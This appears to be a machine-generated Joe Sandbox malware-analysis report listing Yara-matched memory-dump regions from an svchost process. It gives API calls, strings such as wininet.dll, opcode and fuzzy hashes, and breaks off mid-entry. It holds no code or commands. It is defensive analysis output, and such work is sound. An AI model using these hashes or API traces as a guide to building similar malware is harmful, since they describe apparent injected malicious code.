                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                • Opcode ID: 37569995663c40e8c7eafb3225fe40729b80976e86f14d781ad79531e4009e6b
                                                                • Instruction ID: e5f258e5939b39a7fe65c21aafe7d714d3b5fdd23fe9f4399abf7e0783f61373
                                                                • Opcode Fuzzy Hash: 37569995663c40e8c7eafb3225fe40729b80976e86f14d781ad79531e4009e6b
                                                                • Instruction Fuzzy Hash: 91F0E7B2200208ABCB14DF99DC84EDB77AEEF8C724F118648BA0D97245C631E811CBA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • NtCreateFile.NTDLL(00000060,00000000,?,02C3758C,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02C3758C,?,00000000,00000060,00000000,00000000), ref: 02C3C87D
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                • Instruction ID: 11f03e3fa52cee2990c5778b2c743ee96b72d97a5d591a8b3b00b9454b836a1e
                                                                • Opcode Fuzzy Hash: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                • Instruction Fuzzy Hash: CBF074B2215208AFCB48DF89DC85EEB77EDAF8C754F158248BA0D97245D630F851CBA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • NtReadFile.NTDLL(02C37750,02C32C20,FFFFFFFF,02C37233,00000002,?,02C37750,00000002,02C37233,FFFFFFFF,02C32C20,02C37750,00000002,00000000), ref: 02C3C925
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                • Opcode ID: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                • Instruction ID: b78fe504f531d4c0caa85425f6d180a870c91caa42efb79828ba21f7f7553d43
                                                                • Opcode Fuzzy Hash: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                • Instruction Fuzzy Hash: F6F0A4B2210208ABCB14DF99DC84EEB77ADAF8C754F118648BA0DA7245D630E8118BA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,02C217C4,00000004,00001000,00000000), ref: 02C3CA49
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateMemoryVirtual
                                                                • String ID:
                                                                • API String ID: 2167126740-0
                                                                • Opcode ID: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                • Instruction ID: 219921f6f8d6a6f40f9fa463be773db1ff05e88b183cf4de61dff683a1c3b3e6
                                                                • Opcode Fuzzy Hash: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                • Instruction Fuzzy Hash: DEF015B2210208ABCB18DF89DC80EAB77ADAF88764F018148BE0997241C630F810CBB0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • NtClose.NTDLL(02C2E555,00000000,?,02C2E555,?,?,?,?,?,?,?,00000000,?,00000000), ref: 02C3C985
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Close
                                                                • String ID:
                                                                • API String ID: 3535843008-0
                                                                • Opcode ID: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                • Instruction ID: e6ada71cd8f60524cda69f7d687eb1a79c47546cb6ffc0f454986ed2c423ad66
                                                                • Opcode Fuzzy Hash: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                • Instruction Fuzzy Hash: 5DD01772200214ABD614EBA8DC89E977BADDF88660F018495BA1D6B242C530FA108AE1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • NtDeleteFile.NTDLL(02C37552,00000002,?,02C37552,00000000,00000018,?,?,622BA63F,00000000,?), ref: 02C3C955
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DeleteFile
                                                                • String ID:
                                                                • API String ID: 4033686569-0
                                                                • Opcode ID: 9cdb9952ef2d184753929ab23e7c45e026e579668fdbcbf3541df72b633117aa
                                                                • Instruction ID: 337de4666998a57923705f05e24fbd558f6e490d69d1b164c3af7cd052f60197
                                                                • Opcode Fuzzy Hash: 9cdb9952ef2d184753929ab23e7c45e026e579668fdbcbf3541df72b633117aa
                                                                • Instruction Fuzzy Hash: F2D017722402146BD614EB98DC89ED77BACDF88760F018895BA1D6B241C630FA108BE1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                • Associated: 0000000B.00000002.523365530.000000000331B000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3200000_svchost.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: ff899c67af30133906462e94e32b5d880a0068ed0d884a6f90cc2a5cce406c8a
                                                                • Instruction ID: 6b0cac2aa7e67a443dab2c48a24a226d65b640801de6ed53355308306db7d374
                                                                • Opcode Fuzzy Hash: ff899c67af30133906462e94e32b5d880a0068ed0d884a6f90cc2a5cce406c8a
                                                                • Instruction Fuzzy Hash: E690026122184442E200A5794C14B070005ABD0343F51C119A0145554CCA6588A16561
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                • Associated: 0000000B.00000002.523365530.000000000331B000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3200000_svchost.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: fb1cfbc8bfc4f68e387188cc25401e3f6983783a69458d26796f82f1859d8c10
                                                                • Instruction ID: 078e858d57e2e03d0270ff82ba0aad9a61a3106b618d65792fa73394785b27cf
                                                                • Opcode Fuzzy Hash: fb1cfbc8bfc4f68e387188cc25401e3f6983783a69458d26796f82f1859d8c10
                                                                • Instruction Fuzzy Hash: CB9002B121104802E140B16944047460005ABD0341F51C015A5055554E87A98DD576A5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                • Associated: 0000000B.00000002.523365530.000000000331B000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3200000_svchost.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 87e6b7b395fa60b84fd7eb3758437274df6f7b600e564ca9910b0798b797e4af
                                                                • Instruction ID: 33ab2d0d685d626d62c7d2e6d3bff6d15204d31fe5b3dfb1c80763489dd68f69
                                                                • Opcode Fuzzy Hash: 87e6b7b395fa60b84fd7eb3758437274df6f7b600e564ca9910b0798b797e4af
                                                                • Instruction Fuzzy Hash: 089002A135104842E100A1694414B060005EBE1341F51C019E1055554D8769CC927166
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                • Associated: 0000000B.00000002.523365530.000000000331B000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3200000_svchost.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: d4b42efa818ebdd2ca9c5cc007b1d8ee559e97133f337a7c4d224b2907c25511
                                                                • Instruction ID: db75e0d8e5bbd73747c4bf9600d676c66f504b6bb073de8f216608ce1aa01c46
                                                                • Opcode Fuzzy Hash: d4b42efa818ebdd2ca9c5cc007b1d8ee559e97133f337a7c4d224b2907c25511
                                                                • Instruction Fuzzy Hash: D690027121104813E111A16945047070009ABD0281F91C416A0415558D97A68992B161
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                • Associated: 0000000B.00000002.523365530.000000000331B000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3200000_svchost.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 9d251d6cce5fae5cb94ad296935856c501f45cb0f698a5011c8a4e9ed81d85cc
                                                                • Instruction ID: f037894a4908778d39da71a3910caef46d45165448280060c60399fb9bfdb77b
                                                                • Opcode Fuzzy Hash: 9d251d6cce5fae5cb94ad296935856c501f45cb0f698a5011c8a4e9ed81d85cc
                                                                • Instruction Fuzzy Hash: B8900261252085526545F16944045074006BBE0281791C016A1405950C86769896E661
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                • Associated: 0000000B.00000002.523365530.000000000331B000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3200000_svchost.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 31dba4411e219928403b343979b15bba4e776dbfe14b9df739d78928837dc289
                                                                • Instruction ID: 8bfc06e7c11cb1ab5bbb3a6ae525682a64e0c9bcb6c5bcb989b857dca34b7352
                                                                • Opcode Fuzzy Hash: 31dba4411e219928403b343979b15bba4e776dbfe14b9df739d78928837dc289
                                                                • Instruction Fuzzy Hash: 0290027121104802E100A5A954086460005ABE0341F51D015A5015555EC7B588D17171
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                • Associated: 0000000B.00000002.523365530.000000000331B000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3200000_svchost.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 8d7d715aa874561dbf93e29004c89a1b1ac12258bf7239a6221af69f6ce94191
                                                                • Instruction ID: c97fd12761346d65ce139ae699374ab1f8526070f4257c598eff7328708f0639
                                                                • Opcode Fuzzy Hash: 8d7d715aa874561dbf93e29004c89a1b1ac12258bf7239a6221af69f6ce94191
                                                                • Instruction Fuzzy Hash: 9790026922304402E180B169540860A0005ABD1242F91D419A0006558CCA6588A96361
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                • Associated: 0000000B.00000002.523365530.000000000331B000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3200000_svchost.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 5083334d9de2fec95f45360cd0fa4e700f0319dd850173d2923c959a06c772f5
                                                                • Instruction ID: f8ecfbea5556132fe7617229998e1f3c873d993c0d99fc83ddf088f26410656e
                                                                • Opcode Fuzzy Hash: 5083334d9de2fec95f45360cd0fa4e700f0319dd850173d2923c959a06c772f5
                                                                • Instruction Fuzzy Hash: 3B90027132118802E110A16984047060005ABD1241F51C415A0815558D87E588D17162
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                • Associated: 0000000B.00000002.523365530.000000000331B000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3200000_svchost.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 52fd8143086accd5e3473135f0a4ac7b6b520c862427d71591e908361993cddb
                                                                • Instruction ID: 6a58ae800ef7e35f1006269b71e81374038e6d691f5bbcaf8b73345cef3971bf
                                                                • Opcode Fuzzy Hash: 52fd8143086accd5e3473135f0a4ac7b6b520c862427d71591e908361993cddb
                                                                • Instruction Fuzzy Hash: 6090027161504C02E150B16944147460005ABD0341F51C015A0015654D87A58A9576E1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                • Associated: 0000000B.00000002.523365530.000000000331B000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3200000_svchost.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 45adcd197ad7b343f2a1cc972243781d57fdc81343b2c866acb720c990815126
                                                                • Instruction ID: 33add01b7ec24b3a2fafd5c0eb9568d82bfc0f33f11d8bebae3aa28d184bb04b
                                                                • Opcode Fuzzy Hash: 45adcd197ad7b343f2a1cc972243781d57fdc81343b2c866acb720c990815126
                                                                • Instruction Fuzzy Hash: 4390027121104C02E180B169440464A0005ABD1341F91C019A0016654DCB658A9977E1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                • Associated: 0000000B.00000002.523365530.000000000331B000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3200000_svchost.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: d0a008030522e4d0d1c94c1b3dce978cacc22d75f9bec542afe8a90290f96bef
                                                                • Instruction ID: 0d9822df0afa2fb8e70140662e38d0faef42a1a1f62d03f771d6183f4bc416e2
                                                                • Opcode Fuzzy Hash: d0a008030522e4d0d1c94c1b3dce978cacc22d75f9bec542afe8a90290f96bef
                                                                • Instruction Fuzzy Hash: 7890027121508C42E140B1694404A460015ABD0345F51C015A0055694D97758D95B6A1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                • Associated: 0000000B.00000002.523365530.000000000331B000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3200000_svchost.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: bfed3f9d80026e460ee86dbe06bf25c1d6e0b0c8cf8f5fc97ba3c8fecaf68bab
                                                                • Instruction ID: 35c7dca75b241e2cb1a6ecaddd52b00f00ec83f7645d516dfd4b04c192c248e5
                                                                • Opcode Fuzzy Hash: bfed3f9d80026e460ee86dbe06bf25c1d6e0b0c8cf8f5fc97ba3c8fecaf68bab
                                                                • Instruction Fuzzy Hash: 589002712110CC02E110A169840474A0005ABD0341F55C415A4415658D87E588D17161
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                • Associated: 0000000B.00000002.523365530.000000000331B000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3200000_svchost.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: c095945b28b3bea952f538c7e4e1425be6ff5271670bb1b752bb98b170f00658
                                                                • Instruction ID: 300690253314623a02fc5237e0ab79229417c16800fbb885a35fef05261ac892
                                                                • Opcode Fuzzy Hash: c095945b28b3bea952f538c7e4e1425be6ff5271670bb1b752bb98b170f00658
                                                                • Instruction Fuzzy Hash: B590027121104C42E100A1694404B460005ABE0341F51C01AA0115654D8765C8917561
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                • Associated: 0000000B.00000002.523365530.000000000331B000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3200000_svchost.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 207be86656b4aef14cdf08132339db81cfbff479af94302beb1f7fd5e40c551e
                                                                • Instruction ID: 9f72f854a3fcb60b96b7972a823e5a905c03bede67c6b0051059a9df107ed28f
                                                                • Opcode Fuzzy Hash: 207be86656b4aef14cdf08132339db81cfbff479af94302beb1f7fd5e40c551e
                                                                • Instruction Fuzzy Hash: 20900265231044021145E569060450B0445BBD6391391C019F1407590CC77188A56361
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                • Associated: 0000000B.00000002.523365530.000000000331B000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3200000_svchost.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 1d490facbf34e9695db6016cd694b98d68330f912ece427792862a60f3a8c822
                                                                • Instruction ID: 5dbfda2fe17b2d8c880bc35b635bde3aa7121b4f5beccd3120bc943b70c4d153
                                                                • Opcode Fuzzy Hash: 1d490facbf34e9695db6016cd694b98d68330f912ece427792862a60f3a8c822
                                                                • Instruction Fuzzy Hash: 85900265221044031105E56907045070046ABD5391351C025F1006550CD77188A16161
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                • Associated: 0000000B.00000002.523365530.000000000331B000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3200000_svchost.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 9627abd2fee7509caec3252cc77390baaadf7b028ab1c83ec19c698dec73daba
                                                                • Instruction ID: 8edeadf63c898c103233b97691ba355b1ea67170399069a9caa56de790153927
                                                                • Opcode Fuzzy Hash: 9627abd2fee7509caec3252cc77390baaadf7b028ab1c83ec19c698dec73daba
                                                                • Instruction Fuzzy Hash: 489002A1212044035105B1694414616400AABE0241B51C025E1005590DC67588D17165
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorMode
                                                                • String ID:
                                                                • API String ID: 2340568224-0
                                                                • Opcode ID: c13953546f4c55b705fb359b8bfabb5edac4d365304f56eabab4b8b489249783
                                                                • Instruction ID: e47a4247f299e882c24888df8c4c74f0363d895cf5af12f4c13ca67d53dfae66
                                                                • Opcode Fuzzy Hash: c13953546f4c55b705fb359b8bfabb5edac4d365304f56eabab4b8b489249783
                                                                • Instruction Fuzzy Hash: A7A1B2B1D00229ABDB15EFA4CC41FEEB7B9AF88304F14855DE509A7141EB70A748CFA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorMode
                                                                • String ID:
                                                                • API String ID: 2340568224-0
                                                                • Opcode ID: 052b699cdc9770a83d5fed37e0719a9df2c9ffb85a83dbe45e93e47803251464
                                                                • Instruction ID: f28f3ab8c544b6bb1d902e6a0932fc442a436b9d46f1f8a3cea1f0cf9489f1de
                                                                • Opcode Fuzzy Hash: 052b699cdc9770a83d5fed37e0719a9df2c9ffb85a83dbe45e93e47803251464
                                                                • Instruction Fuzzy Hash: A671B1B1D00229AADB21EBA0CC40FEEB7BDEF89304F04455DE51962141EF74AB48CFA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • CoInitialize.OLE32(00000000,00000000,?,00000000), ref: 02C352A7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Initialize
                                                                • String ID: )U$@J7<
                                                                • API String ID: 2538663250-745351555
                                                                • Opcode ID: 2e9acf3ea436267ac6b1c672ba4421ad71cc135f39b066c9471476c081959720
                                                                • Instruction ID: 055da7d23423f8f2a90f639f64421edb0be07f5848dfed6647328d39d059f369
                                                                • Opcode Fuzzy Hash: 2e9acf3ea436267ac6b1c672ba4421ad71cc135f39b066c9471476c081959720
                                                                • Instruction Fuzzy Hash: 2C3132B5A0060A9FDB01DFD8D8809EFB7B9FF88304B108959E519EB214D775EE45CBA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • Sleep.KERNELBASE(000007D0), ref: 02C3B63B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID: net.dll$wininet.dll
                                                                • API String ID: 3472027048-1269752229
                                                                • Opcode ID: 268f49fbe1da827c9e036bf54babcb511f93a76c6f665a7b5ccc6034091e4141
                                                                • Instruction ID: df616c1a95d57bda869259b72443e3fcbe5705003a316abee74897e3e7981f9b
                                                                • Opcode Fuzzy Hash: 268f49fbe1da827c9e036bf54babcb511f93a76c6f665a7b5ccc6034091e4141
                                                                • Instruction Fuzzy Hash: FE31BEB5600704ABD714DFA4D880FABB7F9AB88704F14891DEA5D5B285D670B944CFA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • Sleep.KERNELBASE(000007D0), ref: 02C3B63B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID: net.dll$wininet.dll
                                                                • API String ID: 3472027048-1269752229
                                                                • Opcode ID: 4d6435498d57f30ac29b967735a62a9c8dcd99eb5a11f173fab415c28d69e30d
                                                                • Instruction ID: a6ea4cb80dbd236d0c9c13eb41b90d98bbdb1c6ddf5fe6a1663a92771e112532
                                                                • Opcode Fuzzy Hash: 4d6435498d57f30ac29b967735a62a9c8dcd99eb5a11f173fab415c28d69e30d
                                                                • Instruction Fuzzy Hash: 8631C0B1A00704ABD714DFA4D884FAAF7F9FF88704F14851AEA5C5B285D771A944CFA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(?), ref: 02C2FE03
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID: @
                                                                • API String ID: 3188754299-2766056989
                                                                • Opcode ID: 93454b5118d32c2772475a0d467401533ed4b10397fdd0caec935d0875b7de68
                                                                • Instruction ID: 3f9553b86160c8d5a5b484ecad4671918cd737ddfbd9129355c499fd7a9ad255
